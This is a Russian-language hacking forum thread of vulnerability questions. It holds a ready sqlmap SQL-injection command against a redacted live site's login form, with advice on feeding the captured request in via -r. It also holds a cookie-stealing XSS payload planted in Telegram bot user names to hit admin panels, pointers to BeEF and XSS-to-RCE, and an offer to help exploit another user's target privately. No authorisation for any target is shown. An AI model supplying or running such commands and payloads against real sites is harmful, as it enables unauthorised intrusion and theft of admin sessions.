Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22email%22

    test
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22password%22

    N3tsp@rker-
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22action%22

    login
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22submit%22

    Sign In
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22hash%22

    3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a
    --3e306551ffbd4492975ea8cd2a9917cc--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLHttpRequest\nReferer:https://****/terms" --dbms="MySQL" --batch
    Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,457
    Likes Received:
    776
    Reputations:
    834
    положи весь запрос в файлик и обратись к нему через параметр -r file.txt
     
    _________________________
    AngelEyes likes this.
  3. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    73
    Likes Received:
    53
    Reputations:
    0
    Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.
    Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: <script>alert(document.cookie)</script>
    Зайти в бота, и в админке вуаля

    [​IMG]

    Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,457
    Likes Received:
    776
    Reputations:
    834
    Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS
     
    _________________________
    M.Billar and ms13 like this.
  5. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    73
    Likes Received:
    53
    Reputations:
    0
    [​IMG]


    Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.
     
  6. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Простите за дубль, но все так же в поисках решения
     
  7. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    7
    Кидай в лс, раскрутим ее. Помогу чем смогу
     
Loading...